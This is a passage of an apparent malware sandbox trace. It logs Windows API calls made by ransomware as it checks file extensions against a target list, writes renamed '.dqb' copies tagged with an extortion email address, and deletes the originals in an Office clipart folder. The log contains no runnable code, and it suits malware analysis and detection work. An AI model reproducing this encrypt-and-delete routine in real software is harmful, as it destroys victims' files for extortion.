lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0050.912] lstrlenW (lpString=".1cd") returned 4 [0050.912] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.912] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00164_.GIF") returned 63 [0050.912] lstrlenW (lpString=".jpg") returned 4 [0050.912] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.928] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.928] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.929] GetLastError () returned 0x0 [0050.929] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x2186, lpOverlapped=0x0) returned 1 [0050.930] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x2190, lpOverlapped=0x0) returned 1 [0050.932] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0050.932] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0050.932] SetEndOfFile (hFile=0x178) returned 1 [0050.932] CloseHandle (hObject=0x178) returned 1 [0050.932] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.932] SetEndOfFile (hFile=0x224) returned 1 [0050.933] CloseHandle (hObject=0x224) returned 1 [0050.933] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0050.933] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00165_.gif")) returned 1 [0050.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0050.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0050.933] lstrlenW (lpString=".doc") returned 4 [0050.933] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0050.933] lstrlenW (lpString=".docx") returned 5 [0050.934] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0050.934] lstrlenW (lpString=".pdf") returned 4 [0050.934] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0050.934] lstrlenW (lpString=".xls") returned 4 [0050.934] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0050.934] lstrlenW (lpString=".xlsx") returned 5 [0050.934] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0050.934] lstrlenW (lpString=".ppt") returned 4 [0050.934] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0050.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0050.934] lstrlenW (lpString=".zip") returned 4 [0050.934] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0050.934] lstrlenW (lpString=".rar") returned 4 [0050.934] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0050.934] lstrlenW (lpString=".bz2") returned 4 [0050.934] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0050.934] lstrlenW (lpString=".7z") returned 3 [0050.934] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0050.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0050.934] lstrlenW (lpString=".dbf") returned 4 [0050.934] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0050.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0050.934] lstrlenW (lpString=".1cd") returned 4 [0050.934] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0050.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0050.934] lstrlenW (lpString=".jpg") returned 4 [0050.934] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0050.934] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.935] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0050.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0050.935] GetLastError () returned 0x0 [0050.935] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x131e, lpOverlapped=0x0) returned 1 [0051.205] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x1320, lpOverlapped=0x0) returned 1 [0051.206] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.206] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.206] SetEndOfFile (hFile=0x178) returned 1 [0051.206] CloseHandle (hObject=0x178) returned 1 [0051.206] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.206] SetEndOfFile (hFile=0x224) returned 1 [0051.207] CloseHandle (hObject=0x224) returned 1 [0051.207] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.207] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 1 [0051.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.207] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.208] lstrlenW (lpString=".doc") returned 4 [0051.208] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0051.208] lstrlenW (lpString=".docx") returned 5 [0051.208] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0051.208] lstrlenW (lpString=".pdf") returned 4 [0051.208] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0051.208] lstrlenW (lpString=".xls") returned 4 [0051.208] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0051.208] lstrlenW (lpString=".xlsx") returned 5 [0051.208] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0051.208] lstrlenW (lpString=".ppt") returned 4 [0051.208] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0051.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.208] lstrlenW (lpString=".zip") returned 4 [0051.208] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0051.208] lstrlenW (lpString=".rar") returned 4 [0051.208] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0051.208] lstrlenW (lpString=".bz2") returned 4 [0051.208] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0051.208] lstrlenW (lpString=".7z") returned 3 [0051.208] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0051.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.208] lstrlenW (lpString=".dbf") returned 4 [0051.208] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0051.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.208] lstrlenW (lpString=".1cd") returned 4 [0051.208] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0051.208] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0051.208] lstrlenW (lpString=".jpg") returned 4 [0051.208] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0051.209] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.209] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.209] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0051.209] GetLastError () returned 0x0 [0051.209] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xea2, lpOverlapped=0x0) returned 1 [0051.211] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xeb0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xeb0, lpOverlapped=0x0) returned 1 [0051.211] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.212] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.212] SetEndOfFile (hFile=0x178) returned 1 [0051.212] CloseHandle (hObject=0x178) returned 1 [0051.212] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.212] SetEndOfFile (hFile=0x224) returned 1 [0051.213] CloseHandle (hObject=0x224) returned 1 [0051.213] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.213] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01184_.wmf")) returned 1 [0051.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0051.213] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0051.213] lstrlenW (lpString=".doc") returned 4 [0051.213] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.213] lstrlenW (lpString=".docx") returned 5 [0051.213] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.213] lstrlenW (lpString=".pdf") returned 4 [0051.213] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.213] lstrlenW (lpString=".xls") returned 4 [0051.213] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.213] lstrlenW (lpString=".xlsx") returned 5 [0051.213] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.214] lstrlenW (lpString=".ppt") returned 4 [0051.214] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0051.214] lstrlenW (lpString=".zip") returned 4 [0051.214] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.214] lstrlenW (lpString=".rar") returned 4 [0051.214] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.214] lstrlenW (lpString=".bz2") returned 4 [0051.214] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.214] lstrlenW (lpString=".7z") returned 3 [0051.214] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0051.214] lstrlenW (lpString=".dbf") returned 4 [0051.214] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0051.214] lstrlenW (lpString=".1cd") returned 4 [0051.214] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01184_.WMF") returned 63 [0051.214] lstrlenW (lpString=".jpg") returned 4 [0051.214] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.214] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.214] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0051.215] GetLastError () returned 0x0 [0051.215] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x16cc, lpOverlapped=0x0) returned 1 [0051.216] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0x16d0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0x16d0, lpOverlapped=0x0) returned 1 [0051.217] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.217] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.217] SetEndOfFile (hFile=0x178) returned 1 [0051.217] CloseHandle (hObject=0x178) returned 1 [0051.218] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.218] SetEndOfFile (hFile=0x224) returned 1 [0051.218] CloseHandle (hObject=0x224) returned 1 [0051.218] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.219] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01216_.wmf")) returned 1 [0051.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0051.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0051.219] lstrlenW (lpString=".doc") returned 4 [0051.219] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.219] lstrlenW (lpString=".docx") returned 5 [0051.219] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.219] lstrlenW (lpString=".pdf") returned 4 [0051.219] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.219] lstrlenW (lpString=".xls") returned 4 [0051.219] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.219] lstrlenW (lpString=".xlsx") returned 5 [0051.219] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.219] lstrlenW (lpString=".ppt") returned 4 [0051.219] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.219] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0051.219] lstrlenW (lpString=".zip") returned 4 [0051.219] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.219] lstrlenW (lpString=".rar") returned 4 [0051.219] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.219] lstrlenW (lpString=".bz2") returned 4 [0051.219] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.220] lstrlenW (lpString=".7z") returned 3 [0051.220] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0051.220] lstrlenW (lpString=".dbf") returned 4 [0051.220] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0051.220] lstrlenW (lpString=".1cd") returned 4 [0051.220] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.220] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01216_.WMF") returned 63 [0051.220] lstrlenW (lpString=".jpg") returned 4 [0051.220] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.220] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.220] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.220] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0051.220] GetLastError () returned 0x0 [0051.220] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xbc4, lpOverlapped=0x0) returned 1 [0051.223] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xbd0, lpOverlapped=0x0) returned 1 [0051.223] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.223] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.224] SetEndOfFile (hFile=0x178) returned 1 [0051.224] CloseHandle (hObject=0x178) returned 1 [0051.224] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.224] SetEndOfFile (hFile=0x224) returned 1 [0051.225] CloseHandle (hObject=0x224) returned 1 [0051.225] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0051.225] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01218_.wmf")) returned 1 [0051.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0051.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0051.225] lstrlenW (lpString=".doc") returned 4 [0051.225] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0051.225] lstrlenW (lpString=".docx") returned 5 [0051.225] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0051.225] lstrlenW (lpString=".pdf") returned 4 [0051.225] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0051.225] lstrlenW (lpString=".xls") returned 4 [0051.225] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0051.225] lstrlenW (lpString=".xlsx") returned 5 [0051.225] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0051.225] lstrlenW (lpString=".ppt") returned 4 [0051.225] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0051.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0051.225] lstrlenW (lpString=".zip") returned 4 [0051.226] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0051.226] lstrlenW (lpString=".rar") returned 4 [0051.226] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0051.226] lstrlenW (lpString=".bz2") returned 4 [0051.226] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0051.226] lstrlenW (lpString=".7z") returned 3 [0051.226] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0051.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0051.226] lstrlenW (lpString=".dbf") returned 4 [0051.226] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0051.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0051.226] lstrlenW (lpString=".1cd") returned 4 [0051.226] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0051.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01218_.WMF") returned 63 [0051.226] lstrlenW (lpString=".jpg") returned 4 [0051.226] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0051.226] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.226] SetFilePointerEx (in: hFile=0x224, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c7fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN01251_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an01251_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0051.227] GetLastError () returned 0x0 [0051.227] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0xac4, lpOverlapped=0x0) returned 1 [0051.228] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x2c7fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesWritten=0x2c7fc9c*=0xad0, lpOverlapped=0x0) returned 1 [0051.229] ReadFile (in: hFile=0x224, lpBuffer=0x3760020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c7fed4, lpOverlapped=0x0 | out: lpBuffer=0x3760020*, lpNumberOfBytesRead=0x2c7fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.229] WriteFile (in: hFile=0x178, lpBuffer=0x3760020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c7fc9c, 